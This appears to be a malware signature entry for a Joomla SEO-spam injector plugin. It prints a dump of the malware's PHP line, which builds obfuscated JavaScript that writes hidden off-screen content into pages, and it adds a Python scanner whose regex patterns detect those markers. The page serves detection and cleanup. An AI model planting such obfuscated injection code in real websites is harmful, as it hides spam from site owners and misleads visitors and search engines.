Malware Signatures

php.spam-seo.joomla-injector.001

Blackhat SEO is a malicious technique that manipulates search engine results to boost a website's apparent relevance. The payload is PHP-based and therefore intended for server-side use: it is executed directly on the server while the site is loaded. Only the payload's result (such as a malicious iframe or a redirect) is visible in the browser, not the malicious code itself.
This code installs itself as a Joomla plugin and injects malicious JavaScript code into the target page. The plugin also uses an obfuscation function to hide the code from the untrained eye.

Affecting

Any vulnerable Joomla-based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

You can contact Sucuri to help you with the infection removal.

Dump

$scriptContent = $this->getLongTail().'<script language="JavaScript">var _0xa113=["'.join('", "', $this->obfuscateJavaScript('<style>.'.$className.'{position:absolute;top:-9999px}</style>')).'","x6Cx65x6Ex67x74x68","","x63x68x61x72x41x74","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Ax6Fx69x6E","x77x72x69x74x65"];function _0xad78(){var _0xee8bx2=0,_0xee8bx3,_0xee8bx4,_0xee8bx5,_0xee8bx6;var _0xee8bx7= new Array(_0xa113[0],_0xa113[1],_0xa113[2],_0xa113[3]);var _0xee8bx8=_0xee8bx7[_0xa113[4]];while(++_0xee8bx2<=_0xee8bx8){_0xee8bx3=_0xee8bx7[_0xee8bx8-_0xee8bx2];_0xee8bx5=_0xee8bx6=_0xa113[5];for(_0xee8bx4=0;_0xee8bx4<_0xee8bx3[_0xa113[4]];){_0xee8bx5+=_0xee8bx3[_0xa113[6]](_0xee8bx4++);if(_0xee8bx5[_0xa113[4]]==2){_0xee8bx6+=String[_0xa113[7]](parseInt(_0xee8bx5)+35-_0xee8bx8+_0xee8bx2);_0xee8bx5=_0xa113[5];} ;} ;_0xee8bx7[_0xee8bx8-_0xee8bx2]=_0xee8bx6;} ;document[_0xa113[9]](_0xee8bx7[_0xa113[8]](_0xa113[5]));} ;_0xad78();</script>'
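
The scanner below is an added example, not Sucuri's signature or code from the original page: it flags PHP files in which two or more of the markers visible in the dump above co-occur. The indicator names, the threshold of two and the sample strings are assumptions of this example.

```python
import re
from pathlib import Path

# Indicators taken from the dump on this page; the names are this example's own.
INDICATORS = {
    "longtail_call": re.compile(r"->\s*getLongTail\s*\("),
    "obfuscator_call": re.compile(r"->\s*obfuscateJavaScript\s*\("),
    "offscreen_style": re.compile(r"position\s*:\s*absolute\s*;\s*top\s*:\s*-9999px"),
    "hex_named_array": re.compile(r"var\s+_0x[0-9a-f]+\s*=\s*\["),
    "indexed_document_call": re.compile(r"document\[_0x[0-9a-f]+\[\d+\]\]"),
}
# Assumption: one hit alone (e.g. an off-screen CSS rule) is too common to alert on.
THRESHOLD = 2


def match_indicators(source: str) -> list[str]:
    """Return the names of all indicators found in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def is_suspicious(source: str) -> bool:
    return len(match_indicators(source)) >= THRESHOLD


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root and report every *.php file that reaches the threshold."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        hits = match_indicators(text)
        if len(hits) >= THRESHOLD:
            findings[str(path)] = hits
    return findings


# Constructed samples: a truncated, inert fragment of the dump and a benign rule.
INFECTED = ("$scriptContent = $this->getLongTail().'<script language=\"JavaScript\">"
            "var _0xa113=[\"'.join('\", \"', $this->obfuscateJavaScript("
            "'<style>.'.$className.'{position:absolute;top:-9999px}</style>'))")
BENIGN = "<?php echo '<style>.skip-link{position:absolute;top:-9999px}</style>';"

if __name__ == "__main__":
    import sys
    for file, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(file, ",".join(hits))
```

Run it against the Joomla document root; each reported file should be reviewed by hand, since the match is heuristic.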